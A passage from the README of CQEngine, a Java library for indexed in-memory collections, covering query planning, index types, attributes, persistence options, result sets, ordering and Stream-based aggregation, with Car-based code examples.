indexes, to internally make a query plan which selects the indexes which can perform the query with minimum time complexity. When some referenced fields have suitable indexes and some do not, CQEngine will use the available indexes first, and will then iterate the smallest possible set of results from those indexes to filter objects for the rest of the query. In those cases time complexity will be greater than O(_1_), but usually significantly less than O(_n_) * **Iteration fallback** - if no suitable indexes are available, CQEngine will evaluate the query via iteration, using lazy evaluation. CQEngine can always evaluate every query, even if no suitable indexes are available. Queries are not coupled with indexes, so indexes can be added after the fact, to speed up existing queries * **CQEngine supports full concurrency** and expects that objects will be added to and removed from the collection at runtime; CQEngine will take care of updating all registered indexes in realtime * **Type-safe** - nearly all errors in queries result in _compile-time_ errors instead of exceptions at runtime: all indexes, and all queries, are strongly typed using generics at both object-level and field-level * **On-heap/off-heap/disk** - objects can be stored on-heap (like a conventional Java collection), or off-heap (in native memory, within the JVM process but outside the Java heap), or persisted to disk Several implementations of CQEngine's `IndexedCollection` are provided, supporting various concurrency and transaction isolation levels: * [ConcurrentIndexedCollection](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/ConcurrentIndexedCollection.html) - lock-free concurrent reads and writes with no transaction isolation * [ObjectLockingIndexedCollection](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/ObjectLockingIndexedCollection.html) - lock-free concurrent reads, and some locking of writes for object-level transaction isolation and consistency guarantees * [TransactionalIndexedCollection](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/TransactionalIndexedCollection.html) - lock-free concurrent reads, and sequential writes for full [transaction isolation](documentation/TransactionIsolation.md) using Multi-Version Concurrency Control For more details see [TransactionIsolation](documentation/TransactionIsolation.md). --- ## Complete Example ## In CQEngine applications mostly interact with [IndexedCollection](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/IndexedCollection.html), which is an implementation of [java.util.Set](http://docs.oracle.com/javase/6/docs/api/java/util/Set.html), and it provides two additional methods: * [addIndex(SomeIndex)](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/engine/QueryEngine.html#addIndex(com.googlecode.cqengine.index.Index)) allows indexes to be added to the collection * [retrieve(Query)](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/engine/QueryEngine.html#retrieve(com.googlecode.cqengine.query.Query)) accepts a [Query](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/query/Query.html) and returns a [ResultSet](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/resultset/ResultSet.html) providing objects matching that query. `ResultSet` implements [java.lang.Iterable](http://docs.oracle.com/javase/6/docs/api/java/lang/Iterable.html), so accessing results is achieved by iterating the result set, or accessing it as a Java 8+ Stream Here is a **complete example** of how to build a collection, add indexes and perform queries. It does not discuss _attributes_, which are discussed below. **STEP 1: Create a new indexed collection** ```java IndexedCollection<Car> cars = new ConcurrentIndexedCollection<Car>(); ``` **STEP 2: Add some indexes to the collection** ```java cars.addIndex(NavigableIndex.onAttribute(Car.CAR_ID)); cars.addIndex(ReversedRadixTreeIndex.onAttribute(Car.NAME)); cars.addIndex(SuffixTreeIndex.onAttribute(Car.DESCRIPTION)); cars.addIndex(HashIndex.onAttribute(Car.FEATURES)); ``` **STEP 3: Add some objects to the collection** ```java cars.add(new Car(1, "ford focus", "great condition, low mileage", Arrays.asList("spare tyre", "sunroof"))); cars.add(new Car(2, "ford taurus", "dirty and unreliable, flat tyre", Arrays.asList("spare tyre", "radio"))); cars.add(new Car(3, "honda civic", "has a flat tyre and high mileage", Arrays.asList("radio"))); ``` **STEP 4: Run some queries** Note: add import statement to your class: _`import static com.googlecode.cqengine.query.QueryFactory.*`_ * *Example 1: Find cars whose name ends with 'vic' or whose id is less than 2* Query: ```java Query<Car> query1 = or(endsWith(Car.NAME, "vic"), lessThan(Car.CAR_ID, 2)); cars.retrieve(query1).forEach(System.out::println); ``` Prints: ``` Car{carId=3, name='honda civic', description='has a flat tyre and high mileage', features=[radio]} Car{carId=1, name='ford focus', description='great condition, low mileage', features=[spare tyre, sunroof]} ``` * *Example 2: Find cars whose flat tyre can be replaced* Query: ```java Query<Car> query2 = and(contains(Car.DESCRIPTION, "flat tyre"), equal(Car.FEATURES, "spare tyre")); cars.retrieve(query2).forEach(System.out::println); ``` Prints: ``` Car{carId=2, name='ford taurus', description='dirty and unreliable, flat tyre', features=[spare tyre, radio]} ``` * *Example 3: Find cars which have a sunroof or a radio but are not dirty* Query: ```java Query<Car> query3 = and(in(Car.FEATURES, "sunroof", "radio"), not(contains(Car.DESCRIPTION, "dirty"))); cars.retrieve(query3).forEach(System.out::println); ``` Prints: ``` Car{carId=1, name='ford focus', description='great condition, low mileage', features=[spare tyre, sunroof]} Car{carId=3, name='honda civic', description='has a flat tyre and high mileage', features=[radio]} ``` Complete source code for these examples can be found [here](http://github.com/npgall/cqengine/blob/master/code/src/test/java/com/googlecode/cqengine/examples/introduction/). --- ## String-based queries: SQL and CQN dialects ## As an alternative to programmatic queries, CQEngine also has support for running string-based queries on the collection, in either SQL or CQN (CQEngine Native) format. Example of running an SQL query on a collection (full source [here](https://github.com/npgall/cqengine/blob/master/code/src/test/java/com/googlecode/cqengine/examples/parser/SQLQueryDemo.java)): ```java public static void main(String[] args) { SQLParser<Car> parser = SQLParser.forPojoWithAttributes(Car.class, createAttributes(Car.class)); IndexedCollection<Car> cars = new ConcurrentIndexedCollection<Car>(); cars.addAll(CarFactory.createCollectionOfCars(10)); ResultSet<Car> results = parser.retrieve(cars, "SELECT * FROM cars WHERE (" + "(manufacturer = 'Ford' OR manufacturer = 'Honda') " + "AND price <= 5000.0 " + "AND color NOT IN ('GREEN', 'WHITE')) " + "ORDER BY manufacturer DESC, price ASC"); results.forEach(System.out::println); // Prints: Honda Accord, Ford Fusion, Ford Focus } ``` Example of running a CQN query on a collection (full source [here](https://github.com/npgall/cqengine/blob/master/code/src/test/java/com/googlecode/cqengine/examples/parser/CQNQueryDemo.java)): ```java public static void main(String[] args) { CQNParser<Car> parser = CQNParser.forPojoWithAttributes(Car.class, createAttributes(Car.class)); IndexedCollection<Car> cars = new ConcurrentIndexedCollection<Car>(); cars.addAll(CarFactory.createCollectionOfCars(10)); ResultSet<Car> results = parser.retrieve(cars, "and(" + "or(equal(\"manufacturer\", \"Ford\"), equal(\"manufacturer\", \"Honda\")), " + "lessThanOrEqualTo(\"price\", 5000.0), " + "not(in(\"color\", GREEN, WHITE))" + ")"); results.forEach(System.out::println); // Prints: Ford Focus, Ford Fusion, Honda Accord } ``` --- ## Feature Matrix for Included Indexes ## **Legend for the feature matrix** | **Abbreviation** | **Meaning** | **Example** | |:-----------------|:------------|:------------| | **EQ** | _Equality_ | `equal(Car.DOORS, 4)` | | **IN** | _Equality, multiple values_ | `in(Car.DOORS, 3, 4, 5)` | | **LT** | _Less Than (numerical range / `Comparable`)_ | `lessThan(Car.PRICE, 5000.0)` | | **GT** | _Greater Than (numerical range / `Comparable`)_ | `greaterThan(Car.PRICE, 2000.0)` | | **BT** | _Between (numerical range / `Comparable`)_ | `between(Car.PRICE, 2000.0, 5000.0)` | | **SW** | _String Starts With_ | `startsWith(Car.NAME, "For")` | | **EW** | _String Ends With_ | `endsWith(Car.NAME, "ord")` | | **SC** | _String Contains_ | `contains(Car.NAME, "or")` | | **CI** | _String Is Contained In_ | `isContainedIn(Car.NAME, "I am shopping for a Ford Focus car")` | | **RX** | _String Matches Regular Expression_ | `matchesRegex(Car.MODEL, "Ford.*")` | | **HS** | _Has (aka `IS NOT NULL`)_ | `has(Car.DESCRIPTION)` / `not(has(Car.DESCRIPTION))` | | **SQ** | _Standing Query_ | _Can the index accelerate a query (as opposed to an attribute) to provide constant time complexity for any simple query, complex query, or fragment_ | | **QZ** | _Quantization_ | _Does the index accept a quantizer to control granularity_ | | **LP** | _LongestPrefix_ | `longestPrefix(Car.NAME, "Ford")` | Note: CQEngine also supports complex queries via **`and`**, **`or`**, **`not`**, and combinations thereof, across all indexes. **Index Feature Matrix** | <sub>**Index Type**</sub> | <sub>**EQ**</sub> | <sub>**IN**</sub> | <sub>**LT**</sub> | <sub>**GT**</sub> | <sub>**BT**</sub> | <sub>**SW**</sub> | <sub>**EW**</sub> | <sub>**SC**</sub> | <sub>**CI**</sub> | <sub>**HS**</sub> | <sub>**RX**</sub> | <sub>**SQ**</sub> | <sub>**QZ**</sub> | <sub>**LP**</sub> | |:---------------|:-------|:-------|:-------|:-------|:-------|:-------|:-------|:-------|:-------|:-------|:-------|:-------|:-------|:-------| | [<sub>Hash</sub>](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/index/hash/HashIndex.html) | ✓ | ✓ | | | | | | | | | | | ✓ | | | [<sub>Unique</sub>](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/index/unique/UniqueIndex.html) | ✓ | ✓ | | | | | | | | | | | | | | [<sub>Compound</sub>](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/index/compound/CompoundIndex.html) | ✓ | ✓ | | | | | | | | | | | ✓ | | | [<sub>Navigable</sub>](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/index/navigable/NavigableIndex.html) | ✓ | ✓ | ✓ | ✓ | ✓ | | | | | | | | ✓ | | | [<sub>PartialNavigable</sub>](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/index/navigable/PartialNavigableIndex.html) | ✓ | ✓ | ✓ | ✓ | ✓ | | | | | | | ✓ | | | | [<sub>RadixTree</sub>](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/index/radix/RadixTreeIndex.html) | ✓ | ✓ | | | | ✓ | | | | | | | | | | [<sub>ReversedRadixTree</sub>](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/index/radixreversed/ReversedRadixTreeIndex.html) | ✓ | ✓ | | | | | ✓ | | | | | | | | | [<sub>InvertedRadixTree</sub>](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/index/radixinverted/InvertedRadixTreeIndex.html) | ✓ | ✓ | | | | | | | ✓ | | | | | ✓ | | [<sub>SuffixTree</sub>](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/index/suffix/SuffixTreeIndex.html) | ✓ | ✓ | | | | | ✓ | ✓ | | | | | | | | [<sub>StandingQuery</sub>](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/index/standingquery/StandingQueryIndex.html) | | | | | | | | | | | | ✓ | | | | [<sub>Fallback</sub>](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/index/fallback/FallbackIndex.html) | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | | | ✓ | | [<sub>OffHeap</sub>](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/index/offheap/OffHeapIndex.html) | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | | | | | | ✓<sup>[1]</sup> | | | | [<sub>PartialOffHeap</sub>](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/index/offheap/PartialOffHeapIndex.html) | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | | | | | | ✓ | | | | [<sub>Disk</sub>](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/index/disk/DiskIndex.html) | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | | | | | | ✓<sup>[1]</sup> | | | | [<sub>PartialDisk</sub>](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/index/disk/PartialDiskIndex.html) | ✓ | ✓ | ✓ | ✓ | ✓ | ✓ | | | | | | ✓ | | | <sup>[1]</sup> See: [forStandingQuery()](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/query/QueryFactory.html#forStandingQuery-com.googlecode.cqengine.query.Query-) The [Benchmark](documentation/Benchmark.md) page contains examples of how to add these indexes to a collection, and measures their impact on latency. --- ## Attributes ## ### Read Fields ### CQEngine needs to access fields inside objects, so that it can build indexes on fields, and retrieve the value of a certain field from any given object. CQEngine does not use reflection to do this; instead it uses **attributes**, which is a more powerful concept. An attribute is an accessor object which can read the value of a certain field in a POJO. Here's how to define an attribute for a Car object (a POJO), which reads the `Car.carId` field: ```java public static final Attribute<Car, Integer> CAR_ID = new SimpleAttribute<Car, Integer>("carId") { public Integer getValue(Car car, QueryOptions queryOptions) { return car.carId; } }; ``` ...or alternatively, from a lambda expression or method reference: ```java public static final Attribute<Car, Integer> Car_ID = attribute("carId", Car::getCarId); ``` (For some caveats on using lambdas, please read [LambdaAttributes](documentation/LambdaAttributes.md)) Usually attributes are defined as anonymous `static` `final` objects like this. Supplying the `"carId"` string parameter to the constructor is actually optional, but it is recommended as it will appear in query `toString`s. Since this attribute reads a field from a `Car` object, the usual place to put the attribute is inside the `Car` class - and this makes queries more readable. However it could really be defined in any class, such as in a `CarAttributes` class or similar. The example above is for a **[SimpleAttribute](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/attribute/SimpleAttribute.html)**, which is designed for fields containing only one value. CQEngine also supports **[MultiValueAttribute](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/attribute/MultiValueAttribute.html)** which can read the values of fields which themselves are collections. And so it supports building indexes on objects based on things like keywords associated with those objects. Here's how to define a `MultiValueAttribute` for a `Car` object which reads the values from `Car.features` where that field is a `List<String>`: ```java public static final Attribute<Car, String> FEATURES = new MultiValueAttribute<Car, String>("features") { public Iterable<String> getValues(Car car, QueryOptions queryOptions) { return car.features; } }; ``` ...or alternatively, from a lambda expression or method reference: ```java public static final Attribute<Car, String> FEATURES = attribute(String.class, "features", Car::getFeatures); ``` #### Null values #### Note **if your data contains `null` values**, you should use **[SimpleNullableAttribute](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/attribute/SimpleNullableAttribute.html)** or **[MultiValueNullableAttribute](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/attribute/MultiValueNullableAttribute.html)** instead. In particular, note that `SimpleAttribute` and `MultiValueAttribute` do not perform any null checking on your data, and so if your data inadvertently contains null values, you may get obscure `NullPointerException`s. This is because null checking does not come for free. Attributes are accessed heavily, and the non-nullable versions of these attributes are designed to minimize latency by skipping explicit null checks. They defer to the JVM to do the null checking implicitly. As a rule of thumb, if you get a `NullPointerException`, it's probably because you used the wrong type of attribute. The problem will usually go away if you switch your code to use a nullable attribute instead. If you don't know if your data may contain null values, just use the nullable attributes. They contain the logic to check for and handle null values automatically. The nullable attributes also allow CQEngine to work with [object inheritance](https://github.com/npgall/cqengine/tree/master/code/src/test/java/com/googlecode/cqengine/examples/inheritance), where some objects in the collection have certain optional fields (e.g. in subclasses) while others might not. #### Creating queries dynamically #### Dynamic queries can be composed at runtime by instantiating and combining Query objects directly; see [this package](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/query/simple/package-summary.html) and [this package](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/query/logical/package-summary.html). For advanced cases, it is also possible to define attributes at runtime, using [ReflectiveAttribute](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/attribute/ReflectiveAttribute.html) or [AttributeBytecodeGenerator](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/codegen/AttributeBytecodeGenerator.html). #### Generate attributes automatically #### CQEngine also provides several ways to generate attributes automatically. Note these are an alternative to using [ReflectiveAttribute](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/attribute/ReflectiveAttribute.html), which was discussed above. Whereas `ReflectiveAttribute` is a special type of attribute which reads values at runtime using reflection, `AttributeSourceGenerator` and `AttributeBytecodeGenerator` generate code for attributes which is compiled and so does not use reflection at runtime, which can be more efficient. * [AttributeSourceGenerator](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/codegen/AttributeSourceGenerator.html) can automatically generate the source code for the simple and multi-value attributes discussed above. * [AttributeBytecodeGenerator](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/codegen/AttributeBytecodeGenerator.html) can automatically generate the class bytecode for the simple and multi-value attributes discussed above, and load them into the application at runtime as if they had been compiled from source code. See [AutoGenerateAttributes](documentation/AutoGenerateAttributes.md) for more details. ### Attributes as Functions ### It can be noted that attributes are only required to return a value given an object. Although most will do so, there is no requirement that an attribute must provide a value by reading a field in the object. As such attributes can be _virtual_, implemented as _functions_. **Calculated Attributes** An attribute can **_calculate_** an appropriate value for an object, based on a function applied to data contained in other fields or from external data sources. Here's how to define a calculated (or virtual) attribute by applying a function over the Car's other fields: ```java public static final Attribute<Car, Boolean> IS_DIRTY = new SimpleAttribute<Car, Boolean>("is_dirty") { public Boolean getValue(Car car, QueryOptions queryOptions) { return car.description.contains("dirty"); } }; ``` ...or, the same thing using a lambda: ```java public static final Attribute<Car, Boolean> IS_DIRTY = attribute("is_dirty", car -> car.description.contains("dirty")); ``` A `HashIndex` could be built on the virtual attribute above, enabling fast retrievals of cars which are either dirty or not dirty, without needing to scan the collection. **Associations with other `IndexedCollections` or External Data Sources** Here is an example for a virtual attribute which **associates** with each `Car` a list of locations which can service it, from an external data source: ```java public static final Attribute<Car, String> SERVICE_LOCATIONS = new MultiValueAttribute<Car, String>() { public List<String> getValues(Car car, QueryOptions queryOptions) { return CarServiceManager.getServiceLocationsForCar(car); } }; ``` The attribute above would allow the `IndexedCollection` of cars to be searched for cars which have _servicing options in a particular location_. The locations which service a car, could alternatively be retrieved from another `IndexedCollection`, of `Garage`s, for example. **Care should be taken if building indexes on virtual attributes** however, if referenced data might change leaving obsolete information in indexes. A **strategy to accommodate this** is: if no index exists for a virtual attribute referenced in a query, and other attributes are also referenced in the query for which indexes exist, CQEngine will automatically reduce the candidate set of objects to the minimum using other indexes before querying the virtual attribute. In turn if virtual attributes perform retrievals from _other_ `IndexedCollection`s, then those collections could be indexed appropriately without a risk of stale data. --- ### Joins ### The examples above define attributes on a primary `IndexedCollection` which read data from secondary collections or external data sources. It is also possible to perform SQL EXISTS-type queries and JOINs between `IndexedCollection`s on the query side (as opposed to on the attribute side). See [Joins](documentation/Joins.md) for examples. --- ## Persistence on-heap, off-heap, disk ## CQEngine's `IndexedCollection`s can be configured to store objects added to them on-heap (the default), or off-heap, or on disk. **On-heap** Store the collection on the Java heap: ```java IndexedCollection<Car> cars = new ConcurrentIndexedCollection<Car>(); ``` **Off-heap** Store the collection in native memory, within the JVM process but outside the Java heap: ```java IndexedCollection<Car> cars = new ConcurrentIndexedCollection<Car>(OffHeapPersistence.onPrimaryKey(Car.CAR_ID)); ``` Note that the off-heap persistence will automatically create an index on the specified primary key attribute, so there is no need to add an index on that attribute later. **Disk** Store the collection in a temp file on disk (then see `DiskPersistence.getFile()`): ```java IndexedCollection<Car> cars = new ConcurrentIndexedCollection<Car>(DiskPersistence.onPrimaryKey(Car.CAR_ID)); ``` Or, store the collection in a particular file on disk: ```java IndexedCollection<Car> cars = new ConcurrentIndexedCollection<Car>(DiskPersistence.onPrimaryKeyInFile(Car.CAR_ID, new File("cars.dat"))); ``` Note that the disk persistence will automatically create an index on the specified primary key attribute, so there is no need to add an index on that attribute later. **Wrapping** Wrap any Java collection, in a CQEngine IndexedCollection without any copying of objects. * This can be a convenient way to run queries or build indexes on existing collections. * However some caveats relating to concurrency support and the performance of the underlying collection apply, see [WrappingPersistence](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/persistence/wrapping/WrappingPersistence.html) for details. ```java Collection<Car> collection = // obtain any Java collection IndexedCollection<Car> indexedCollection = new ConcurrentIndexedCollection<Car>( WrappingPersistence.aroundCollection(collection) ); ``` **Composite** `CompositePersistence` configures a combination of persistence types for use within the same collection. The collection itself will be persisted in the first persistence provided (the _primary persistence_), and the additional persistences provided will be used by off-heap or disk indexes added to the collection subsequently. Store the collection on-heap, and also configure DiskPersistence for use by DiskIndexes added to the collection subsequently: ```java IndexedCollection<Car> cars = new ConcurrentIndexedCollection<Car>(CompositePersistence.of( OnHeapPersistence.onPrimaryKey(Car.CAR_ID), DiskPersistence.onPrimaryKeyInFile(Car.CAR_ID, new File("cars.dat")) )); ``` ### Index persistence ### Indexes can similarly be stored on-heap, off-heap, or on disk. Each index requires a certain type of persistence. It is necessary to configure the collection in advance with an appropriate combination of persistences for use by whichever indexes are added. It is possible to store the collection on-heap, but to store some indexes off-heap. Similarly it is possible to have a variety of index types on the same collection, each using a different type of persistence. On-heap persistence is by far the fastest, followed by off-heap persistence, and then by disk persistence. If both the collection and all of its indexes are stored off-heap or on disk, then it is possible to have extremely large collections which don't use any heap memory or RAM at all. CQEngine has been tested using off-heap persistence with collections of 10 million objects, and using disk persistence with collections of 100 million objects. **On-heap** Add an on-heap index on "manufacturer": ```java cars.addIndex(NavigableIndex.onAttribute(Car.MANUFACTURER)); ``` **Off-heap** Add an off-heap index on "manufacturer": ```java cars.addIndex(OffHeapIndex.onAttribute(Car.MANUFACTURER)); ``` **Disk** Add a disk index on "manufacturer": ```java cars.addIndex(DiskIndex.onAttribute(Car.MANUFACTURER)); ``` ### Querying with persistence ### When either the `IndexedCollection`, or one or more indexes are located off-heap or on disk, take care to close the ResultSet when finished reading. You can use a _try-with-resources_ block to achieve this: ```java try (ResultSet<Car> results = cars.retrieve(equal(Car.MANUFACTURER, "Ford"))) { results.forEach(System.out::println); } ``` --- ## Result Sets ## CQEngine [ResultSet](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/resultset/ResultSet.html)s provide the following methods: * [iterator()](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/resultset/ResultSet.html#iterator()) - Allows the `ResultSet` to be iterated, returning the next object matching the query in each iteration as determined via _lazy evaluation_ * Result sets support **concurrent iteration** while the collection is being modified; the set of objects returned simply may or may not reflect changes made during iteration (depending on whether changes are made to areas of the collection or indexes already iterated or not) * [uniqueResult()](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/resultset/ResultSet.html#uniqueResult()) - Useful if the query is expected to only match one object, this method returns the first object which would be returned by the iterator, and it throws an exception if zero or more than one object is found * [size()](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/resultset/ResultSet.html#size()) - Returns the number of objects which _would be returned by the `ResultSet` if it was iterated_; CQEngine can often **accelerate** this calculation of size, based on the sizes of individual sets in indexes; see JavaDoc for details * [contains()](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/resultset/ResultSet.html#contains(O)) - Tests if a _given object_ would be contained in results matching a query; this is also an **accelerated** operation; when suitable indexes are available, CQEngine can avoid iterating results to test for containment; see JavaDoc for details * [getRetrievalCost()](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/resultset/ResultSet.html#getRetrievalCost()) - This is a metric used internally by CQEngine to allow it to _choose between multiple indexes_ which support the query. This could occasionally be used by applications to ascertain if suitable indexes are available for any particular query, this will be `Integer.MAX_VALUE` for queries for which no suitable indexes are available * [getMergeCost()](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/resultset/ResultSet.html#getMergeCost()) - This is a metric used internally by CQEngine to allow it to _re-order_ elements of the query to minimize time complexity; for example CQEngine will order intersections such that the smallest set drives the _merge_; this metric is _roughly_ based on the theoretical cost to iterate underlying result sets * For query fragments requiring _set union_ (`or`-based queries), this will be the _sum_ of merge costs from underlying result sets * For query fragments requiring _set intersection_ (`and`-based queries), this will be the _Math.min()_ of merge costs from underlying result sets, because intersections will be re-ordered to perform lowest-merge-cost intersections first * For query fragments requiring _set difference_ (`not`-based queries), this will be the merge cost from the first underlying result set * [stream()](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/resultset/ResultSet.html#stream()) - Returns a Java 8+ `Stream` allowing CQEngine results to be grouped, aggregated, and transformed in flexible ways using lambda expressions. * [close()](http://htmlpreview.github.io/?http://raw.githubusercontent.com/npgall/cqengine/master/documentation/javadoc/apidocs/com/googlecode/cqengine/resultset/ResultSet.html#close()) - Releases any resources or closes the transaction which was opened for the query. Whether or not it is necessary to close the ResultSet depends on which implementation of IndexedCollection is in use and the types of indexes added to it. --- ## Deduplicating Results ## It is possible that a query would result in the same object being returned more than once. For example if an object matches several attribute values specified in an `or`-type query, then the object will be returned multiple times, one time for each attribute matched. Intersections (`and`-type queries) and negations (`not`-type queries) do not produce duplicates. By default, CQEngine does _not_ perform de-duplication of results; however it can be _instructed_ to do so, using various strategies such as Logical Elimination and Materialize. Read more: [DeduplicationStrategies](documentation/DeduplicationStrategies.md) --- ## Ordering Results ## By default, CQEngine does not order results; it simply returns objects in the order it finds them in the collection or in indexes. CQEngine can be instructed to order results via query options as follows. **Order by price descending** ```java ResultSet<Car> results = cars.retrieve(query, queryOptions(orderBy(descending(Car.PRICE)))); ``` **Order by price descending, then number of doors ascending** ```java ResultSet<Car> results = cars.retrieve(query, queryOptions(orderBy(descending(Car.PRICE), ascending(Car.DOORS)))); ``` Note that ordering results as above uses the default _materialize_ ordering strategy. This is relatively expensive, dependent on the number of objects matching the query, and can cause latency in accessing the first object. It requires all results to be materialized into a sorted set up-front _before iteration can begin_. ### Index-accelerated ordering ### CQEngine also has support to use an index to accelerate, or eliminate, the overhead of ordering results. This strategy reduces the latency to access the first object in the sorted results, at the expense of adding more total overhead if the entire ResultSet was iterated. Read more: [OrderingStrategies](documentation/OrderingStrategies.md) --- ## Merge Strategies ## Merge strategies are the algorithms CQEngine uses to evaluate queries which have multiple branches. By default CQEngine will use strategies which should suit most applications, however these strategies can be overridden to tune performance. Read more: [MergeStrategies](documentation/MergeStrategies.md) --- ## Index Quantization, Granularity, and tuning index size ## [Quantization](http://en.wikipedia.org/wiki/Quantization_(signal_processing)) involves converting fine-grained or continuous values, to discrete or coarse-grained values. A Quantizer is a _function_ which takes fine-grained values as input, and maps those values to coarse-grained counterparts as its output, by discarding some precision. Quantization can be a useful tool to tune the size of indexes, trading a reduction in index size, for increases in CPU overhead and vice-versa. Read more: [Quantization and included Quantizers](documentation/IndexQuantization.md) --- ## Grouping and Aggregation (GROUP BY, SUM...) ## CQEngine has been designed with support for grouping and aggregation in mind, but note that this is not built into the CQEngine library itself, because CQEngine is designed to integrate with Java 8+ `Stream`s. This allows CQEngine results to be grouped, aggregated, and transformed in flexible ways using lambda expressions. CQEngine `ResultSet` can be converted into a Java 8 `Stream` by calling `ResultSet.stream()`. Note that Streams are **evaluated via filtering** and they do not avail of CQEngine indexes. So **for best performance, as much of the overall query as possible should be encapsulated in the CQEngine query**, as opposed to in lambda expressions in the stream. This combination would dramatically outperform a stream and lambda expression alone, which simply filtered the collection. Here's how to transform a `ResultSet` into a `Stream`, to compute the distinct set of Colors of cars which match a CQEngine query. ```java public static void main(String[] args) { IndexedCollection<Car> cars = new ConcurrentIndexedCollection<>(); cars.addAll(CarFactory.createCollectionOfCars(10)); cars.addIndex(NavigableIndex.onAttribute(Car.MANUFACTURER)); Set<Car.Color> distinctColorsOfFordCars = cars.retrieve(equal(Car.MANUFACTURER, "Ford")) .stream() .map(Car::getColor) .collect(Collectors.toSet()); System.out.println(distinctColorsOfFordCars); // prints: [GREEN, RED] } ``` --- ## Accessing Index 